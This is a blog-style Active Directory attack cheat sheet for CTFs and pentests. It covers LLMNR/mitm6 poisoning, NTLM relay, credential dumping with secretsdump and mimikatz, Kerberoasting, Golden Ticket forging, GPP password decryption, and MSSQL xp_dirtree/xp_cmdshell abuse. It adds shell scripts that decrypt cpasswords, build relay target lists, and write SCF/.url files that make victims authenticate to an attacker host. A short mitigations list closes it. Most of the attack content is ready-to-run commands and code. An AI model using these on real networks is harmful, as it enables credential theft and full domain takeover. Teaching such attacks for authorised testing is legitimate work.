Cybersecurity & Bug Bounty Cheat Sheet — Active Directory Attacks & Post-Exploitation
Eugene Softley (softsec)
April 1, 2026 (Updated: April 1, 2026)
Active Directory (AD) is where things get serious. If you can move inside a domain, escalate privileges, and control identity, you own the network.
This guide is a practical AD attack playbook for CTFs and real pentests. Angle-bracketed values such as <ip>, <dc-ip> and <share> below are placeholders you fill in for the engagement.
🎯 1. Core AD Attack Surface
🔥 High-Value Attack Vectors
LLMNR Poisoning
SMB Relay
mitm6 (IPv6 MITM)
Kerberoasting
GPP (Group Policy Preferences)
EternalBlue (MS17-010)
Golden Ticket
👉 These are the fastest paths to domain compromise. Only EternalBlue is a software exploit; the rest abuse protocol defaults and misconfiguration, and Golden Ticket is the persistence step once you hold the krbtgt hash.
⚡ 2. Fast Pentest Strategy (Real-World)
🧭 Short Engagement Workflow
1. Start poisoning, each in its own terminal (with Responder's SMB and HTTP servers set to Off in Responder.conf if you intend to relay instead of capture):
responder -I eth0 -dwP
mitm6 -d domain.local
2. Scan while the poisoners run: nmap -sC -sV <subnet>
3. Look for:
SMB signing not required (the nmap check is in section 13)
HTTP services (80/443)
Default credentials (Jenkins, printers, CMS)
4. Exploit: ntlmrelayx.py -tf targets.txt -smb2support
👉 targets.txt must contain only hosts that do not require SMB signing; a relay to a signing-required host simply fails.
🌐 3. Core Ports & Enumeration
📡 RPC (135)
rpcclient -U "" -N <ip>
Useful RPC Commands:
enumdomusers
querydispinfo
👉 Enumerates users; querydispinfo includes the description field, which sometimes holds password hints.
📁 SMB (445)
🔍 Share Enumeration
smbclient -L //<ip> -N
cme smb <ip> -u '' -p '' --shares
cme smb <ip> -u '' -p '' --users
(null session shown; substitute -u <user> -p <pass> once you have credentials)
🔓 Password Policy
cme smb <ip> -u '' -p '' --pass-pol
👉 A lockout threshold of 0 means no lockout, so brute force is safe; otherwise stay below the threshold within the observation window and password-spray instead.
📂 Mount Shares
sudo mount -t cifs //<ip>/<share> /mnt -o username=<user>,password=<pass>
(use -o guest for shares that allow anonymous access)
🔎 Anonymous Access
smbmap -H <ip>
🔐 4. Credential Dumping
🧠 Dump Secrets
secretsdump.py domain/user:pass@<ip>
👉 Extract:
SAM hashes (local accounts)
LSA secrets (service account passwords, cached domain logons)
NTDS hashes of every domain account when the target is a DC and the user has replication rights (DCSync); add -just-dc-ntlm to fetch only those
🧬 LSASS Dump Analysis
pypykatz lsa minidump lsass.dmp
👉 Look for:
NTLM hashes
Plaintext creds (only when WDigest is enabled; it is off by default since Windows 8.1/2012 R2)
Kerberos tickets
🔁 5. RID Cycling Attack
lookupsid.py domain/user:pass@<ip>
lookupsid.py anonymous@<ip> -no-pass
👉 Brute forces RIDs through LSARPC (LsarLookupSids) to list users and groups. The second form uses a null session and works against DCs that still allow one, so you get usernames without any credentials.
🎫 6. Kerberos Attacks
👥 User Enumeration
kerbrute userenum --dc <dc-ip> -d domain.local users.txt
👉 Sends AS-REQs without pre-authentication data, so no password is tried and nothing locks out; the DC may log each probe as a 4768 failure.
🧪 AS-REP Roasting (No Password Needed)
GetNPUsers.py domain.local/ -dc-ip <dc-ip> -no-pass -usersfile users.txt -format hashcat -outputfile asrep.txt
👉 Only accounts with "Do not require Kerberos preauthentication" set are affected. Crack with: hashcat -m 18200 asrep.txt rockyou.txt
🔥 Kerberoasting (With Credentials)
GetUserSPNs.py domain.local/user:pass -dc-ip <dc-ip> -request -outputfile tgs.txt
👉 Crack: hashcat -m 13100 tgs.txt rockyou.txt (RC4 tickets, $krb5tgs$23$). If a service account only allows AES you get $krb5tgs$17$ or $krb5tgs$18$ hashes, which need -m 19600 or 19700 and crack far more slowly. Go after user accounts with SPNs; machine account passwords are random and uncrackable.
🖥️ 7. Remote Code Execution (RCE)
🧰 Impacket Tools
psexec.py domain/user:pass@<ip>
wmiexec.py domain/user:pass@<ip>
smbexec.py domain/user:pass@<ip>
👉 All three need local admin on the target. psexec.py uploads a binary to ADMIN$ and creates a service (noisy); wmiexec.py runs commands over DCOM/WMI and creates no service; smbexec.py creates a service per command but uploads nothing. Each accepts -hashes :<nt-hash> for pass-the-hash.
🧠 WinRM Access
evil-winrm -i <ip> -u user -H <nt-hash>
👉 Needs 5985/5986 open and the user in Remote Management Users (or Administrators). Always check: whoami /all
👑 8. Golden Ticket Attack
💀 Total Domain Takeover
Dump KRBTGT Hash
mimikatz
lsadump::lsa /inject /name:krbtgt
(run on the DC as SYSTEM; from any domain-joined host with replication rights use DCSync instead: lsadump::dcsync /domain:domain.local /user:krbtgt)
Forge Ticket
kerberos::golden /user:FakeAdmin /domain:domain.local /sid:<domain-sid> /krbtgt:<krbtgt-nt-hash> /ptt
(the domain SID is the SID from whoami /user without the trailing RID; from Linux: ticketer.py -nthash <krbtgt-nt-hash> -domain-sid <domain-sid> -domain domain.local FakeAdmin, then export KRB5CCNAME=FakeAdmin.ccache)
👉 Grants access to ALL machines. The forged TGT is accepted even for a user that does not exist, defaults to a ten-year lifetime, and stays valid until the krbtgt password is changed twice. Defenders spot it through TGTs with abnormal lifetimes and service-ticket requests (4769) from accounts that never obtained a TGT from the KDC (no matching 4768).
🧨 9. GPP Exploitation (MS14–025)
📂 Find Credentials in SYSVOL
smbclient //<dc-ip>/SYSVOL -U domain/user
👉 Look under <domain>/Policies/{<GUID>}/{Machine,User}/Preferences/ for Groups.xml (also Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml); a cpassword="..." attribute is the prize. Every domain user can read SYSVOL, so any low-privileged account is enough. Shortcut: cme smb <dc-ip> -u user -p pass -M gpp_password
🔓 Decrypt Password
gpp-decrypt <cpassword>
👉 This works because Microsoft published the AES-256 key used for cpassword. MS14-025 stopped GPMC from saving new passwords but did not remove existing ones, so old Groups.xml files still leak local admin credentials years later.
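What gpp-decrypt does under the hood, as an added shell example that is not part of the original post or of gpp-decrypt itself: decrypt a cpassword with the AES-256 key Microsoft documented for Group Policy Preferences, and pull every cpassword out of a Preferences XML file. The key and zero IV are the documented ones; gpp_encrypt exists only to build test fixtures (it mirrors what GPMC did before MS14-025), and the Groups.xml in the usage is constructed. Requires openssl, iconv and base64.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or from gpp-decrypt: the cpassword
# scheme behind MS14-025. Group Policy Preferences encrypted passwords with AES-256-CBC,
# an all-zero IV and a fixed key that Microsoft documented in MS-GPPREF, so anyone
# who can read SYSVOL can decrypt them. Needs openssl, iconv and base64.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b   # published key
GPP_AES_IV=00000000000000000000000000000000                                    # 16 zero bytes

# gpp_decrypt CPASSWORD: print the plaintext password
gpp_decrypt() {
    b64="$1"
    # the attribute stores base64 with the '=' padding stripped; restore it
    while [ $(( ${#b64} % 4 )) -ne 0 ]; do b64="${b64}="; done
    printf '%s' "$b64" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | iconv -f UTF-16LE -t UTF-8          # GPP stores the password as UTF-16LE
}

# gpp_encrypt PASSWORD: what GPMC did before MS14-025; used here only to build fixtures
gpp_encrypt() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
        | openssl enc -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | base64 | tr -d '\n='
}

# gpp_scan_xml FILE: for every element carrying a cpassword attribute in a Preferences
# XML file (Groups.xml, Services.xml, ScheduledTasks.xml, ...), print "user<TAB>password"
gpp_scan_xml() {
    grep 'cpassword=' "$1" | while read -r line; do
        user=$(printf '%s' "$line" | grep -o 'userName="[^"]*"' | head -n 1 | sed 's/^userName="//; s/"$//')
        b64=$(printf '%s' "$line" | grep -o 'cpassword="[^"]*"' | head -n 1 | sed 's/^cpassword="//; s/"$//')
        if [ -n "$b64" ]; then
            printf '%s\t%s\n' "${user:-?}" "$(gpp_decrypt "$b64")"
        fi
    done
}

# usage once SYSVOL is mounted or copied locally (paths are placeholders):
#   find /mnt/sysvol -name '*.xml' -path '*Preferences*' | while read -r f; do gpp_scan_xml "$f"; done
```

Because the key is public and the IV is constant, there is no secret involved at all; "decryption" here is just knowing the format, which is why cpassword values should be treated as plaintext when found.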
🧠 10. LLMNR Poisoning
🎣 Capture Hashes
responder -I eth0 -dwP
👉 Captures NTLMv2 challenge-responses (user::DOMAIN:challenge:NTProofStr:blob) from hosts that fall back to LLMNR/NBT-NS for names DNS cannot resolve (typos, stale mapped drives). They are not reusable for pass-the-hash: crack them, or relay them live as in section 13.
🔓 Crack
hashcat -m 5600 hash.txt rockyou.txt
(if you forced an NTLMv1 downgrade with --lm, the mode is 5500)
🌐 11. mitm6 + NTLM Relay
⚡ Attack Flow
mitm6 -d domain.local
ntlmrelayx.py -6 -t ldaps://<dc-ip> -wh fake.domain.local -l loot
👉 mitm6 answers DHCPv6 so Windows hosts, which prefer IPv6, start using the attacker as their DNS server; -wh serves a WPAD entry under your fake hostname so hosts authenticate to your "proxy", and ntlmrelayx relays that NTLM authentication to LDAPS on the DC.
Dumps (into ./loot):
Credentials
Domain info (users, groups, computers, policy, as HTML/JSON/grep-able files)
👉 Requires LDAP signing and channel binding to be unenforced on the DC. Add --delegate-access to create a computer account and configure resource-based constrained delegation on the relayed machine account, which is the usual route from a relayed computer to a shell on it.
🧬 12. Mimikatz Essentials
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
👉 Capabilities:
Credential dumping (privilege::debug needs local admin; sekurlsa::* reads LSASS and fails under LSA Protection or Credential Guard; lsadump::sam needs SYSTEM, so run token::elevate first)
Pass-the-hash (sekurlsa::pth /user:<user> /domain:domain.local /ntlm:<nt-hash>)
Ticket forging (kerberos::golden, kerberos::ptt)
🔄 13. SMB Relay Attack
⚙️ Setup Responder
responder -I eth0 -dwv
👉 In Responder.conf, set these to Off so Responder only poisons and leaves ports 445 and 80 to ntlmrelayx:
SMB = Off
HTTP = Off
(and do not use the -P auth proxy option)
🚀 Launch Relay
ntlmrelayx.py -tf targets.txt -smb2support
👉 By default the relay dumps the local SAM of each target; use -c "<command>" to execute a command instead, or -i for an interactive SMB client. The relayed user needs local admin on the target for either.
🎯 Find Vulnerable Hosts
nmap --script=smb2-security-mode.nse -p445 10.10.20.0/24
👉 SMB signing must NOT be required ("Message signing enabled but not required"). Workstations default to not required; domain controllers require it, so they never belong in targets.txt. A relayed session also cannot be reflected back to the host it came from.
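The nmap output above still has to become the targets.txt fed to ntlmrelayx.py -tf, which is also step 3 of the section 2 workflow. Here is an added shell example, not code from the original post, that parses nmap's normal output and keeps only hosts whose signing is not required; SAMPLE_NMAP is constructed scan output, not a real scan, and scan_relay_targets is the live wrapper for when you have a network.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: turn the smb2-security-mode scan
# into the targets.txt that ntlmrelayx.py -tf expects, keeping only hosts whose SMB
# signing is "enabled but not required" (or disabled). SAMPLE_NMAP is constructed
# nmap -oN output for testing, not a real scan.

# relay_targets [FILE]: print one relayable IP per line (reads stdin if FILE is absent)
relay_targets() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }   # "name (ip)" -> ip
        /Message signing enabled but not required|Message signing disabled/ {
            if (host != "") print host
        }
    ' "$@"
}

# scan_relay_targets SUBNET: the live version; writes targets.txt for ntlmrelayx.py
scan_relay_targets() {
    nmap --script=smb2-security-mode -p445 --open "$1" -oN - | relay_targets > targets.txt
}

# Constructed sample: a DC (signing required) and two workstations (not required)
SAMPLE_NMAP='Nmap scan report for dc01.domain.local (10.10.20.5)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.20.7
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for ws02.domain.local (10.10.20.9)
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required'

# usage: printf '%s\n' "$SAMPLE_NMAP" | relay_targets   -> 10.10.20.7 and 10.10.20.9
```

The DC drops out automatically because it requires signing, which is exactly the host you would otherwise be tempted to put first in the list.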
🧠 14. Post-Exploitation Enumeration
🔍 PowerView
powershell -ep bypass
. .\PowerView.ps1
Get-NetUser
Get-NetDomain
🧬 BloodHound
bloodhound-python -u user -p pass -d domain.local -ns <dc-ip> -c all --zip
👉 The pip package installs the collector as bloodhound-python; -ns points DNS resolution at the DC and --zip packages the JSON for import. Visualize:
Privilege paths
Attack chains (shortest path to Domain Admins, Kerberoastable users, ACL abuse)
🧪 15. Privilege Escalation Checks
whoami /priv
whoami /groups
net user
🔧 PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
👉 Checks unquoted service paths, weak service permissions, writable service binaries, AlwaysInstallElevated and stored credentials.
🎣 16. SCF Attack (Hash Capture Trick)
Drop a file whose icon points at your SMB server into a share that users browse, e.g. @clickme.scf (the leading @ sorts it to the top so Explorer renders it as soon as the folder opens); .url shortcuts with an IconFile entry work the same way.
👉 Forces SMB auth to the attacker host → NTLMv2 captured by Responder (or relayed). You need write access to a share the victims actually open, such as a shared documents folder.
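The shortcut files themselves, as an added shell example that is not part of the original post: one function writes the SCF, the other the .url variant. The attacker IP and the share name "share" are placeholders; both files use CRLF line endings because Explorer parses them as Windows INI files.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: generate the shortcut files for the
# SCF trick. Placed in a share users browse, each makes Explorer fetch an icon over SMB
# from the attacker host as soon as the folder is opened, so the user's NTLMv2 response
# lands in Responder (or ntlmrelayx). The attacker IP and share name are placeholders.

# make_scf ATTACKER_IP OUT_DIR: writes OUT_DIR/@clickme.scf (CRLF line endings, as
# Windows expects; the leading "@" sorts the file to the top of the listing)
make_scf() {
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' "$1" \
        > "$2/@clickme.scf"
}

# make_url ATTACKER_IP OUT_DIR: the .url variant, used where the SCF file no longer
# triggers the icon fetch on the target's Windows build
make_url() {
    printf '[InternetShortcut]\r\nURL=http://%s/\r\nIconIndex=1\r\nIconFile=\\\\%s\\share\\icon.ico\r\n' "$1" "$1" \
        > "$2/@clickme.url"
}

# usage: make_scf 10.10.20.99 /mnt/share && make_url 10.10.20.99 /mnt/share
#        (with responder -I eth0 -dwv already listening on 10.10.20.99)
```

Drop both: whichever the target's Explorer still honours will trigger, and each capture is a fresh NTLMv2 response, so the file keeps paying out every time the folder is opened.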
🗄️ 17. MSSQL Abuse
mssqlclient.py domain/user:pass@<ip> -windows-auth
Trigger Auth Leak
EXEC master..xp_dirtree '\\<attacker-ip>\share'
👉 The SQL Server service account authenticates to your share; capture it with Responder or relay it. If the login has sysadmin, enable_xp_cmdshell followed by xp_cmdshell <command> inside mssqlclient gives code execution as that service account.
🛡️ 18. Key Mitigations (Blue Team Insight)
🔒 Critical Defenses
Require SMB signing on all hosts, not just DCs (kills relay)
Disable LLMNR & NBT-NS (kills Responder poisoning); disable WPAD and unused IPv6, or run your own DHCPv6 (kills mitm6)
Require LDAP signing and channel binding on DCs (kills the LDAP relay)
Disable NTLM where possible
Enforce strong passwords; long random passwords or gMSAs for accounts with SPNs; pre-authentication required on every account
Limit privileges: no local admin for everyday users, no Domain Admin logons on workstations, LSA Protection or Credential Guard; rotate krbtgt twice after any DC compromise; purge cpassword entries from SYSVOL
🧠 Key Takeaways
✔ AD attacks = identity attacks
✔ Misconfigurations > exploits
✔ Hashes = access
✔ SMB + Kerberos = your main playground
#pentesting #active-directory #bug-bounty #ctf #cybersecurity